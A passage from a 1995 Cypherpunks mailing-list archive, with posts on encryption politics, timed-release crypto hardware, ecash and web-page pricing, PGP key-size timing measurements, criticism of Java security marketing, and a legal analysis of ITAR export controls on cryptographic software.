> Newt's an optimist (from the government perspective.)
> At some point in the not-very-distant future, 
> _everybody_ is going to have encryption the government can't break!

Oviously, Newt missed a briefing somewhere.  His comments leave the
impression that -- in the recent past and even at present -- we only had
encryption which Governments could break.  This is nonsense. 

We've always had encryption which the government couldn't break.  We've
had it in the past.  We have it at present.  And we will have it in the
future. 

We've always had "non-breakable" private communication. 

A simple example.  If I was negotiating at a table with my legal team
around me, and the opposing team across from me, and I wanted to send a
message to my team that is for their eyes only, all I have to do is write
something on the writing pad in front of me, and I have a secure
communications channel to them. 

I can even write it in plain text. 

My team sees it, while the other team doesn't.  This _really_ should not 
surprise anyone ... especially Newt. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From tcmay at got.net  Thu Nov  9 13:33:34 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 05:33:34 +0800
Subject: Timed-release crypto and information economics
Message-ID: <acc7a170020210041a84@[205.199.118.202]>


At 6:52 PM 11/9/95, Beavis B. Thoopit wrote:
>> That's a pretty large number of assumptions:
>>
>>       tamper-proof delay line
>>       => tamper-proof crypto box ("transformation function with state")
>>       => tamper-proof delay line
>>
>> Why not just put a tamper-proof clock in the tamper-proof crypto box
>> and not bother with the delay lines?
>
>The tamper proof aspect is really secondary to the math question.
>The idea that if I set up a stream of bits through a transform, that
>the original state of the transform affects the final outcome after
>N iterations.

The tamper-proof (more correctly, "tamper-resistant" or
"tamper-responding") hardware is so that attackers do not alter the clocks,
as one example, to "speed up" the time release. Or grab the key, as another
example.

(Cranking up the clock speed may or may not be possible and still have the
device work, but it's still an attack to consider.)

If the attacker can grab the internal state of the device, he can of course
run the "transform" talked about above on his equipment.

>If the transform exists, it will ease/eliminate the reliance on the
>"economics" of cryptography to build a tamper-proof physical device.

You'll need to more carefully argue your thesis. I cannot imagine a method,
save perhaps for quantum computing techniques, which can avoid the need for
"secure secrets," either via a person keeping a secret or a box keeping a
secret.

If the box is not secure against tampering, and an attacker gets in, he
effectively "knows" all of the secrets.

BTW, the "launch into solar orbit" scheme that has again surfaced here is
just a variant of making the costs of an attack very high.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From anonymous-remailer at shell.portal.com  Thu Nov  9 13:45:32 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 10 Nov 1995 05:45:32 +0800
Subject: Many Topics are Appropriate for Discussion Here
Message-ID: <199511092020.MAA28155@jobe.shell.portal.com>


On Fri, 3 Nov 1995, Perry E. Metzger wrote:

>Timothy C. May writes:
>> Implying that the reason Bellovin and Karn left the list--if they did, as I
>> haven't checked--was because of "off-topic" posts seems to be a stretch.
> 
>They both left because the noise level was too high and the
>cryptography content too low. I'll ask Steve to comment if you insist.

I'd be interested as to whether or not they are tuned in here, either
directly or indirectly through some type of list reflector/filter.  Some
people might just read this list and not post.  They may not have anything
to say or contribute, or maybe they just don't want to add to list noise,
but hopefully they do keep up with the mailing list discussion as a first
priority. 

Just because someone doesn't post, doesn't mean that they've left, or not
listening.  It just means that we aren't hearing from them. 

Steve Bellovin, (if this is the AT&T, Steve Bellovin) has corresponded
with me.  He wrote me about the security flaw in Netscape I detailed to
this list, so I can assume from that, that he IS aware of it and is still
aware of the list (if it is the AT&T Steve Bellovin, I mean).  If not, my
mistake. 

I suppose I could ask him whether he is reading this list, or not.

Is Steve AT&T's Security Officer or something?  He never really introduced
himself when he emailed me, and he never presented me with any credentials
or letters of introduction.  But if he is so well known (news to me), and
has a well known reputation -- probably a reputation on a par with noted
international electro-virologist, "Dr. Frederick B. Cohen" -- then he's
probably a very busy fellow. 

I wonder who he is at AT&T?

>> Lots of other people have joined the list, and the subscription base has
>> done from an earlier plateau of about 700 subscribers to more than 1200
>> recently.
> 
>I don't care about quantity. Steve Bellovin is worth 500 subscribers
>-- maybe 1000. I'd rather hear his or Phil's off the cuff remarks on a
>lot of this stuff than most of what passes for careful thought from
>the average person here.

Yes.  He is worthwhile from what I have seen.

He has said that he will probably be consulted at AT&T if there is ever
any type of Internet issue.  I'm not sure if that makes him one of AT&T's
Internet consultants or whether he is one of the responsible persons at
AT&T.  But I'd rather let Steve speak for himself on that. 

I don't know if Steve has the explicit authority to have the Chairman take
his call as an example and I doubt that -- on his pen -- a full Board
Meeting could be convened to bring all opinions forward to the table, so
that those who are CHARGED with decision making CAN make decisions. 

I think he probably has to go through channels. 

(Direct access to senior management is generally part and parcel of any 
functioning security policy.  It has to be.  And I assume that AT&T does 
have one.)

I'm slowly working through my mail queue, and will probably reply soon to
Steve's email.  It's flagged.  And I can probably ask at that time whether
he DOES read this list, and settle the issue. 

I really don't want to bother him though with trivial questions and
comments when he's probably busy forming an inter-departmental Working
Group to *carefully* deal with the Netscape issue -- a large committee to
focus on the problem that blindsided AT&T, a committee to focus on
deployment strategies.  I assume that that's why Steve's not posting to
this list and providing free entertaining content to Internet subscribers. 

He's probably too DAMNED busy.  (And not getting paid NEARLY enough ;)

I hope that AT&T's Netscape Security Audit Working Group's first order of
business is to elect one person to deal with external email, rather than
having each individual employee from AT&T send, _yours truly_ a "Me Too"
... "I'm responsible"  ... "this is MY turf" reply.  But that's not a list
discussion so I'll take it off-line where it belongs, and keep Perry
as happy as I can.)

That discussion ... the "everyone at AT&T is responsible" one, belongs
with the Netscape one ... the one where "no one at Netscape is
responsible", the one where "nobody from Netscape ever replies" to your
email. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From tcmay at got.net  Thu Nov  9 13:45:43 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 05:45:43 +0800
Subject: Market Value of Web Pages
Message-ID: <acc79e46010210045c32@[205.199.118.202]>


At 6:51 PM 11/9/95, Bill Frantz wrote:

>BTW - I don't think we should be talking about a penny/page cost because it
>is way too high for the current market.  For example, my copy of Applied
>Cryptography V2 cost about $.067/page AND came with the media to keep it
>"forever".  My (used) copy of Snow Crash cost closer to a penny/page and
>also came with the media.  I would think that somewhere between 1/100 to
>1/10 of a penny/page is closer to the current market value of the page
>content.

With all due respect to Bill--his mention of agorics tells me he knows
something about computational ecologies and markets--, there is no
reasonable way to say what price is "closer to the current market value of
the page content," except by what the market will bear!

Yes, a paperback novel is a penny a page or so. But a 5-page consultant's
report that sells for $2000 has a "market value" to someone of $400 a page.
You can all think of all kinds of other examples.

Closer to home, a copy of "Penthouse" which sells for $5 and which has
perhaps 10 photographs of "interest" to someone can be said to roughly have
a value of $.50 per Web page of equivalent material. "Penthouse" and
"Playboy," to name just two examples, have "members only" Web pages, and
they are apparently doing OK financially. (Other "members only" Web pages
may also be doing well....it is _these_ Web pages that provide an example
of paid access in contrast to the some other examples, where even a
fraction of a cent per page is too much.)

Personally, I've yet to pay for a Web page. Too much "free" stuff, too much
stuff coming out of the firehose. (And a lot of JPEGs from the "members
only" page are being "liberated" and posted--often through remailers--to
the alt.binaries.pictures.* "free" newsgroups, or placed on other Web
pages.)

I expect this to someday change, and to pay for some things at a fraction
of a cent per hit, some other things for a few cents a hit, and maybe even
some things at dollars per hit.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From tcmay at got.net  Thu Nov  9 13:54:39 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 10 Nov 1995 05:54:39 +0800
Subject: ecash speed
Message-ID: <acc7a3f604021004b22d@[205.199.118.202]>


At 8:21 PM 11/9/95, jim bell wrote:

>The problem:  How do you pay, say, 1/10th of a penny for a good or service
>if the minimum denominated coin is a penny?   This is important, because as
>we all know the cost of providing computer services of all kinds (and data
>transmission) can be expected to continue to drop as time progresses.   If
>we allow the minimum size coin to control our lives, it will keep prices
>higher than they ought to be and prevent low-cost services from existing.

A non-problem.

Ask any business whether the "minimum denominated coin" is a penny. Perhaps
the minimum denoominated _coin_ is a penny, in the U.S., but vast numbers
of widgets are priced at sub-cent levels.

True, no purchase orders are written for sub-cent prices, but this is a
transaction cost issue, not something basic to the currency. (Likewise,
Hal's concerns about ecash speed are basically transaction cost issues.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From jlasser at rwd.goucher.edu  Thu Nov  9 13:56:29 1995
From: jlasser at rwd.goucher.edu (Jon Lasser)
Date: Fri, 10 Nov 1995 05:56:29 +0800
Subject: PGP Comment feature weakens remailer security
In-Reply-To: <199511091413.JAA15288@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951109151948.23203B-100000@rwd.goucher.edu>


On Thu, 9 Nov 1995, Perry E. Metzger wrote:

> > I agree entirely. That's why my PGP key at school is 382 bits. It's a
> > lot easier to compromise my machine than factor a 382 bit number.
> 
> On the other hand, it costs nothing by most people's standards to use
> a 1024 bit key, so why not use one? I find that there is only a point
> in using low security for anything in particular when there is a
> perceivable cost to it -- if the cost is typing a different number
> while doing key generation, I don't see why one should suffer the
> tradeoff.

Actually, it makes a sort of sense; if I see a 384 bit PGP key, it 
strikes me as insecure, and I really consider it; unless it says so on 
the 1024 bit key, I wouldn't think about it much.  It's useful as a human 
identifier, assuming it's not the weakest link in the chain.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser at rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.






From raph at CS.Berkeley.EDU  Thu Nov  9 14:03:59 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Fri, 10 Nov 1995 06:03:59 +0800
Subject: Small keysizes do make sense (was PGP Comment weakens...)
In-Reply-To: <199511091951.OAA15564@jekyll.piermont.com>
Message-ID: <199511092046.MAA16851@kiwi.cs.berkeley.edu>


> I've found that in practice the compression pass takes longer than the
> RSA pass for PGP. If you accept the time for the file compression I
> don't see how you can have trouble with the 1024 bit RSA operation.

When in doubt, measure. The following measurements were done on a DEC
Alpha 3000/300, 150Mhz, Digital Unix 3.2. The first test file was an
email I sent this morning, with a size of 5379 bytes, which is typical
for the email I send. The second test file was the PostScript version
of a 52 page tech report done by our research group this summer, with
a size of 656676 bytes. The version of PGP used was MIT 2.6.2, compiled
with the default osf configuration (-O compile flag).

In all cases, user time only (not system time) is measured. This seems
reasonable, because neither compression nor RSA inherently require I/O.
The standard deviation on timings was somewhere around 5 or 10 ms. I
took the average "by eye" over about ten runs each. I did not include
signing tasks, as neither PGP/MIME signing nor clearsigning include a 
compression step.

Task 1: encrypt file, generating compressed output (RSA is quadratic)
keysize  compression  time   file size in   file size out
---------------------------------------------------------
382      on           95 ms   5379 bytes      2205 bytes
382      off          90 ms   5379 bytes      8165 bytes
1024     on           90 ms   5379 bytes      2315 bytes
1024     off          85 ms   5379 bytes      8275 bytes
382      on           3.86 s  656676 bytes    255575 bytes
382      off          2.43 s  656676 bytes    920984 bytes
1024     on           3.84 s  656676 bytes    255685 bytes
1024     off          2.43 s  656676 bytes    921090 bytes

Task 2: decrypt file from Task 1 (RSA is cubic)
keysize  compression  time   file size in   file size out
---------------------------------------------------------
382      on           135 ms  2205 bytes      5379 bytes
382      off          140 ms  8165 bytes      5379 bytes
1024     on           1.14 s  2315 bytes      5379 bytes
1024     off          1.14 s  8275 bytes      5379 bytes
382      on           1.43 s  255575 bytes    656676 bytes
382      off          2.68 s  920984 bytes    656676 bytes
1024     on           2.42 s  255685 bytes    656676 bytes
1024     off          3.74 s  921090 bytes    656676 bytes

We can conclude that for small files, the size of a typical email,
compression is completely negligible, and the effect of key size is
significant. We can also conclude that for large compressible files,
compression increases encryption time by roughly two seconds per
MB, but decreases decryption time by roughly the same amount (by
virtue of having to decrypt fewer bytes).

Raph







From moroni at prufrocks.scranton.com  Thu Nov  9 14:15:56 1995
From: moroni at prufrocks.scranton.com (Moroni)
Date: Fri, 10 Nov 1995 06:15:56 +0800
Subject: Exporting software doesn't mean exporting
In-Reply-To: <199511080054.QAA29419@email.pdcorp.com>
Message-ID: <Pine.LNX.3.91.951109163123.5118A-100000@prufrocks.scranton.com>


   Where can one get a copy of ITAR ? Secondly , has anyone written any 
books on the subject and if so who and what?

                    Thanks in advance,

                       Deirdre






From llurch at networking.stanford.edu  Thu Nov  9 15:01:44 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Fri, 10 Nov 1995 07:01:44 +0800
Subject: Exporting software doesn't mean exporting
In-Reply-To: <Pine.LNX.3.91.951109163123.5118A-100000@prufrocks.scranton.com>
Message-ID: <Pine.ULT.3.91.951109140853.9570A-100000@Networking.Stanford.EDU>


On Thu, 9 Nov 1995, Moroni wrote:

>    Where can one get a copy of ITAR ? Secondly , has anyone written any 
> books on the subject and if so who and what?

I believe ITAR is 22 USC $ 2278 and environs, which should be at
http://www.law.cornell.edu/uscode/22/2778.html. I can't quote from it
right this second because there seems to be a routing problem inside
sprintlink (must be SAIC censoring us).

Books, I dunno.

-rich





From sameer at c2.org  Thu Nov  9 15:32:01 1995
From: sameer at c2.org (sameer)
Date: Fri, 10 Nov 1995 07:32:01 +0800
Subject: Many Topics are Appropriate for Discussion Here
In-Reply-To: <199511092020.MAA28155@jobe.shell.portal.com>
Message-ID: <199511092229.OAA05862@infinity.c2.org>


> Is Steve AT&T's Security Officer or something?  He never really introduced
> himself when he emailed me, and he never presented me with any credentials
> or letters of introduction.  But if he is so well known (news to me), and
> has a well known reputation -- probably a reputation on a par with noted
> international electro-virologist, "Dr. Frederick B. Cohen" -- then he's
> probably a very busy fellow. 


	Steve's reputation is not on par w/Dr Fred's. Steve is
actually respected. I will refrain from commenting on Dr. Fred's
reputation. ("If you don't have anything nice to say...")

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer at c2.org





From anonymous-remailer at shell.portal.com  Thu Nov  9 15:41:11 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 10 Nov 1995 07:41:11 +0800
Subject: Java insecurity - long - argumentative - you are warned.
Message-ID: <199511092241.OAA14102@jobe.shell.portal.com>


On Mon, 6 Nov 1995, Ray Cromwell wrote:

> > WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> > A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!
> > 
> > >From the Java Web pages (as combined in Firewalls/BoS):
> > 
> > > The language's security features (not just applets):
> 
> [Long list of bullshit deleted]

I don't think that this is *bullshit* ... the questions I mean ... but,
I for one am tired of people promoting products in a manner which flies 
in direct contravention of expert consensus.

No one would accept a pharmaceutical company that says a product is X, 
if it is in fact Y.  And no one would question if a researcher came 
forward, and corrected the company and set the record straight.

This is generally called ETHICS ... not bullshit.  The problem is not in 
the messenger, it's in the organization that is simply willing to 
roll the dice when it comes to public safety and security.

>  "Dr" Cohen. If you want to criticize Java, why not read the technical
> papers rather than spewing questions and assertions based from ignorance.

I've got a better suggestion.  Why don't companies like Sun ensure 
that their sales and technical material is reviewed for gross 
inaccuracies and/or misrepresentations?

> When you want to criticize a piece of engineering, you don't look
> at the feature list or white paper. As is made clear in your post,
> you don't know the meanings of phrases used in the Java paper, nor do
> you understand how the machinery works. (e.g. byte code verifier)

I won't speak for Dr. Frederick B. Cohen, but I will speak for myself,
and provide this list with but a single example.  And I won't quote
from a white paper, but will instead quote from some Sun literature
which crossed my desk the day before yesterday, literature that Sun
provided as part of their worldwide introduction of Ultra workstations.

What they called a "breakthrough for network computing".

What follows is not "technical commentary", but is simply what they
provide as information to MIS managers, Sun resellers and invited
press. This copyrighted brochure, which looks like it was printed
11/95 makes the following verbatim comment on the "Java Internet
Application Language".

> Java has an extensive library of routines for coping with TCP/IP 
> protocols such as HTTP and FTP.  Java applications can open and access 
> objects across the net via URLs with the same ease that programmers are 
> used to when accessing a local file system.
>
> Java is intended to be used in networked/distributed environments.  
> Therefore, much emphasis has been placed on security.  The product 
> enables programmers to create virus-free, tamper-free systems through 
> public-key encryption authentication techniques.

Hmmm, maybe I'm confused, but this is grossly overselling a product's
capabilities, and is setting absolutely unrealistic expectations --
expectations which are doomed from the start never to be met, let
alone exceeded.  This expectations/satisfaction gap will ultimately
lead to customer dis-satisfaction.

Then again ... the solution to virus-free, tamper-free systems with
TCP/IP protocol "coping" has always been a problem that's been waiting
for a "product solution" to help all of us to enable our programmers.

God help us all.

As part of my copious spare time, I might make a personal comment
which hopefully gets to some of the powers that be at Sun.

Firstly, I wasn't aware that HTTP was a TCP/IP protocol.  I didn't
even think that there was a draft RFC on it.  I thought that all that
there was, was an internet-draft, which is a different kettle of fish.
I never realized that HTTP was on standards track, and part of the
appliction protocol.  It really is news to me.  But that's a quibble,
and I'm really behind on my reading, so, I could be wrong.

My second comment is perhaps more actionable.  I would much rather
that a product clearly and definitively state what it has implemented.
Maybe something like the following.

Implementation of the following IETF (Internet Engineering Task Force)
protocols :IP (RFCs 791, 894; MIL-STD 1777); UDP (RFC 768); TCP (RFC
793, MIL-STD 1778); ARP (RFC 826); RARP (RFC 903); ICMP (RFC 792);
BootP (RFCs 951, 1048); RIP (IDEA004); DNS (RFCs 1034, 1035); Internet
Subnetting (RFC 950); and Internet Assigned Numbers (RFC 1010). Maybe,
also that the product complies with Requirements for Internet Hosts
Communications Layers (RFC 1122) and with A Standard for the
Transmission of IP Datagrams over IEEE 802 Networks (RFC 10..
something or other).

This is far more informative (ironically) than saying that:

> Java has an extensive library of routines for coping with TCP/IP
> protocols such as HTTP and FTP.

Hmmm, FTP.  That's RFC 7?? or something like that, isn't it?? 

As an example, I'd like to know how Java handles a file, that is called
foo.bar.au.  Does a .au file refer to an audio file, or does it refer to
something from Australia??  

I'll stop here, and not continue with my deconstruction, especially
the part that continues:

> Java is intended to be used in networked/distributed environments.
> Therefore, much emphasis has been placed on security.  The product
> enables programmers to create virus-free, tamper-free systems through
> public-key encryption authentication techniques.

To every problem, a product solution ... we can leave mathematician's
at the door, and simply enable our programmers.

Those technical analyst rocket scientist types, really can't know
anything, at all.  Can they?



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.


P.P.S. To Sun:   I was also a bit disappointed that nobody thought to 
       show what a vice-presidential tribble looks like on satellite 
       simulcast ... then again, I was thrilled with the female 
       "trader" who spoke about patterns in chaotic systems to her 
       cab driver.  

       Did she work the back office at Daiwa, or something??  Probably 
       believe's in runs of luck, too ...







From junger at pdj2-ra.F-REMOTE.CWRU.Edu  Thu Nov  9 15:56:00 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Fri, 10 Nov 1995 07:56:00 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <m0tDf8g-0004LGC@pdj2-ra.F-REMOTE.CWRU.Edu>



In our recent correspondence on this list with the heading ``Re:
Exporting software doesn't mean exporting'', Michael Froomkin and I
seem to have two different areas of disagreement:  (i) whether the
ITAR's provisions relating to cryptographic software apply to foreign
persons who disclose (or transmit) cryptographic software to another
foreign person without the United States and (ii) whether there is a
separation of powers (or ultra vires) argument that can be made
against the application of those provisions to anyone, foreign or
estados-unidian, in the United States or abroad.

In this message I will limit myself to the first area of disagreement
and will try to deal with the second area in a later message.

As I tried to say, somewhat clumsily, before, and may have caused some
confusion in doing so, there are so many reasons why the provisions of
the ITAR relating to cryptographic software are unconstitutional and
so even more reasons why those provisions are unenforceable, that I
find it difficult to discuss whether those unenforceable and
unconstitutional provisions can be enforced against a foreign person
who discloses software to another person outside of the United States.
I am, after all, firmly convinced that those provisions cannot be
enforced against him, because I do not believe that those provisions
can be enforced against anyone.  (Though in some ways a foreign person
outside the United States is more vulnerable than a United States
person or a foreign person within the United States, since the outside
foreign person has (arguably) less constitutional protections.)

When I said

  (But of course the ITAR as applied to cryptographic software--and that
  is all that I am talking about--are so unconstitutional in so many
  different ways that nothing is going to turn on that one issue.)

the one issue that I was referring to was the status of outside
foreign persons and, of course, that is not the issue that ``is now in
front of two district judges.''  (I hope that the issue before the two
federal district judges is the issue of the constitutionality of the
ITAR's provisions relating to cryptographic software, but both cases
raise relatively narrow factual issues and may end up being resolved
(if one dares call such a result a resolution) on the grounds that the
issues are not appealable under the Administrative Procedure Act or
that administrative remedies were not exhausted or even that the the
provisions of the ITAR in question are unconstitutional but that that
determination that is good for that day and that train only.)

Now Mr. Froomkin says:

  In short, in this particular case the ACEA, and by extention the
  ITAR, doesn't "say what it says" it "says what it must mean".

(And I dare him to make that assertion in the faculty lounge at Miami
when some of the more critical and analytically inclined members of
the Miami law faculty are present.)  I would take this as an admission
that the ACEA and the ITAR does say what it says (even if it must mean
something else) were it not for the fact that--and this was my ``ultra
vires'' point--that the ACEA doesn't say it.

(In discussing the quoted passage I am assuming that ``extention''
must mean ``extension'' and that it is not used as the opposite of
``intention'', if only because I don't know what the latter would be.
But on the other hand the only dictionaries I have to hand are the COD
and the on-line version of Webster's Collegiate.)

The AECA doesn't contain any definition of ``export'' whatsoever; the
whole issue that we are discussing turns on the interpretation of what
the ITAR says when it defines ``export'' as including:

  Disclosing (including oral or visual disclosure) or transferring
  technical data to a foreign person, whether in the United States or
  abroad ....

Now Mr. Froomkin seems to be contending that this language must be
interpreted as it would be interpreted by some sort of neo-Platonic
court (probably sitting in Rawl's original position by designation),
which he calls ``any court''.  The contention is:

  any court construing the ACEA would inevitably read the prohibition
  on "exporting" to a foreign person as not applying where the nation
  lacks jurisdiction.  

Now it was my argument--which Mr. Froomkin helpfully calls an ``ultra
vires'' argument--that any court reading the ACEA would notice (i)
that there is no language in that act defining ``export'' and (ii)
that ``export'' does not mean disclosing, or even transferring,
information (which is what cryptographic software is) and (iii) that,
in consequence, the Office of Defense Trade Controls exceeded its
congressionally granted authority, and therefore its constitutional
authority, when it came up with the perverse provision that is at
issue here.  But that is the subject of my other, as yet unwritten,
message.

Now I take it that Mr. Froomkin's contention turns on the claim that
Congress lacks jurisdiction under international law to pass a
statute--or authorize a regulation--that makes it a crime for a
foreign person to transmit something to another person when both of
them are outside the United States.  So as to avoid the other
constitutional and ultra vires and so on issues, let us assume that
Congress were to amend the ACEA to make it a crime ``to transfer a
cryptographic device to a foreign person within the United States or
abroad without first obtaining a license or a waiver of jurisdiction
from the Office of Defense Trade Controls.''

And now assume that someone, F, who is a foreign person and who has
never been in the United States transfers a cryptographic device that
was not made in the United States or by a United States company to
another foreign person who person who has never been in the United
States.  And now assume that F does come to the United States on a
holiday and that he is arrested and indicted for violating the AECA in
that he did transfer a cryptographic device to a foreign person.

The first thing to notice is that the indictment is not defective.
The only defense--since it is the only one that we are interested in
and we control the hypothetical--is: ``but that was in a foreign
country'' and therefore the United States has no jurisdiction under
international law (or under something) to treat F's actions as a
crime.

So the defense moves to dismiss the indict on those grounds.  And the
prosecution stipulates that the acts charged occured in a foreign
country, that F is a foreign person, etc.

On those facts I would hope that the court would construe the statute
as not covering F's actions outside the United States and would dismiss
the indictment, but--considering that the statute specifically says it
applies both within the United States and ``abroad''--I am not nearly
as sanguine as Mr. Froomkin is.  But let us assume that the indictment
is dismissed.

And now the hypothetical provision in the ACEA is again amended by
congress to make it a crime ``for (i) a United States citizen to
transfer a cryptographic device to a foreign person within the United
States or abroad or (ii) a foreign person to transfer a cryptographic
device to a foreign person within the United States or abroad, without
in either case first obtaining a license or a waiver of jurisdiction
from the Office of Defense Trade Controls.''


And now assume that F', who has never been in the United States
transfers a cryptographic device to a foreign person and thereafter
comes to the United States and is arrested indicted for violating the
hypothetical provision of the ACEA.  It would seem to me that there is
no way that any but the most willfully wrong-headed court (and there
are, I admit, such courts) would construe the hypothetical provision
as not covering F's actions, since it does so clearly cover those
actions.  I mean that there is no way that the court can get away with
concluding that it does not mean what it says.

So what can F' do now?  Well, he could try to raise the claim that the
lack of ``jurisdiction''--which is the justification for Mr. Froomkin's
``any court'' construing the ITAR's actual provisions would not apply
to F or F'--is a ground for dismissing the indictment.

But how can he raise that point?  He can't very well deny that the
court has jurisdiction over his person--he's sitting in the court with
shackels on--and he can't get away with claiming that the court
doesn't have jurisdiction to try him for violating the ACEA.

So it would seem that F's only hope would be to move to dismiss the
indictment on the ground that to continue the prosecution would be to
deny him due process because the United States lacks jurisdiction
under international law.

Now I am no expert in this area, but I would be surprised if the
courts would recognize this as costitutional defense.  As I understand
it from talking with somebody here at CWRU who is knowledgeable, the
courts of the United States tend to defer in such cases to Congress
and the executive--when they are in agreement, as they would be in our
hypothetical--and principles of international law count for little.

So F' will ``inevitably''--to use Mr. Froomkin's word--be convicted of
the crime of delivering a cryptographic device to a foreign person
outside of the United States.

Now lets get back to the ITAR as it is actually written.  In an actual
criminal action brought against a foreign person who is accused of
disclosing cryptographic information to a foreigner outside the United
States--not that I think such an action will ever actually be
brought--the government can point out to the court the facts that I
have just discussed, so the court will be aware that there is no
constitutional provision requiring the dismissal the indictment, even
if the indictment is contrary to international law.  And a real court,
as opposed to Mr. Froomkin's ``any court'' might in those
circumstances feel free to determine that the ITAR means what it says.
(That's just common sense.)

And, were the government ever to bring such a case it, it would argue,
and I think that it would convince a lot of real judges, that the
criminal action does not violate international law because the United
States is protecting its own economic interests by prosecuting foreign
persons who disclose cryptographic information to other foreign
persons outside the United States.  The government's lawyer will
argue:

  Judge, the United States is in a real bind.  It is absolutely
  necessary for our national security that we forbid the export of
  cryptographic software.  But, on the other hand, as those
  Cryptopunks keep pointing out, we are distroying our computer
  industry by enforcing the ITAR against American companies.  So the
  only solution is to apply the ITAR against foreigners as well so
  that the American computer industry will have a levelled--I mean a
  level--field to play upon.  And the anti-trust cases make it
  absolutely clear that the United States does have jurisdiction to
  enforce its laws against foreign  criminal who break those laws
  outside of the United States when their crimes have a negative
  effect upon the economy of the United States.

I am afraid that most federal district court judges would buy that
argument, and I am not even sure that Mr. Froomkin's ``any court''
wouldn't buy it. 

And, in any case, if such a criminal case were to be brought, the
government would almost certainly be able to allege additional facts
to help justify the claim that the US does have jurisdiction over the
matter under international law.

For example, the defendant might be French, and the French government
might be cheering the United States government on.  If the crime is a
crime under both French law and the law of the United States then
there is going to be no problem with the United States asserting
jurisdiction.  (That is, if I understand it correctly, Mr. Froomkin's
murder example.)

Or the defendant may have studied cryptography in the United States,
before he returned home and disclosed the information.

Or the information that he disclosed had previously been unlawfully
exported from the United States in violation of the ITAR (PGP, for
example).

Or the foreign person is an employee of a United States company or a
foreign company doing business in the United States.

Or even that the disclosure was done by a message transmitted over the
Internet that happened to be routed through the United States.

But the matter is even more simple than that since the government is
not going to bring those criminal charges against a foreign person or
a United States person or anyone else if they can possibly avoid it.
The ITAR's provisions on cryptographic software are used by the
government to spread fear, uncertainty, and doubt, and to discourage
the spread of strong cryptography.  Since an actual criminal case
would almost certainly result in at least significant parts of those
provisions being held unconstitutional, the government is not going to
bring such a case if it can find any other ways of satisfying its
goal.

And looked at that way, our foreign person who discloses cryptographic
software to one or more other foreign persons abroad is going to be
the perfect fall guy.  As I have suggested before, the government will
simply bar him from getting a visa to enter the United States since
violation of United States foreign trade regulations is a ground for
denying a visa--at least an immigrants visa.  And, despite Mr.
Froomkin's claim that our foreign person would have a cause of action
if his ``petition'' were denied, he would probably have no recourse
whatsoever.  Certainly he would have no claim that the United States
has no jurisdiction to exclude him for acts done by him outside the
United States; the United States has jurisdiction to exclude
foreigners for things that the foreigners did outside the United
States, like believing in polygamy.  And a foreign person outside the
United States may not have standing to complain of violations of his
freedom of speech outside the United States in an American court.

But let us assume, contra-factually that Mr. Froomkin is right, and
that the poor, excluded foreign person would have a good cause of
action to force the government to give him a visa.  (Though I really
am curious as to what that action would be.)  That cause of action is
going to cost tens of thousands of dollars to pursue, and it will take
years before it is resolved in favour of our foreign person, who will
be excluded--or sitting in jail with a bunch of Cuban and Chinese
refugees--until the case is resolved in his failure.

I am sorry to have written such a long message, and to have been so
slow in writing it, but I think that part of the problem is that both
Mr. Froomkin and I were shooting from the hip, and that is why our
disagreement grew.

But perhaps it has all been worthwhile, for I do think that there are
a few useful conclusions that can be drawn from this discussion:

  (i) We academic lawyers tend to try to settle real world questions
  as if they were academic questions;

  (ii) It is never safe to assume that any court will construe a
  statute or a regulation as meaning something other than what it
  says; 

  (iii) One can only construe a legal text in a particular context;
  even if one thinks that one can figure out how any court would
  interpret the text in qustion, one still nees to know how the text
  got before the court; and

  (iv) The fact that you can always sue the police for unconstitutional
  harassment isn't of much help when they reach for the rubber hose.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger at pdj2-ra.f-remote.cwru.edu    junger at samsara.law.cwru.edu






From vznuri at netcom.com  Thu Nov  9 16:03:09 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
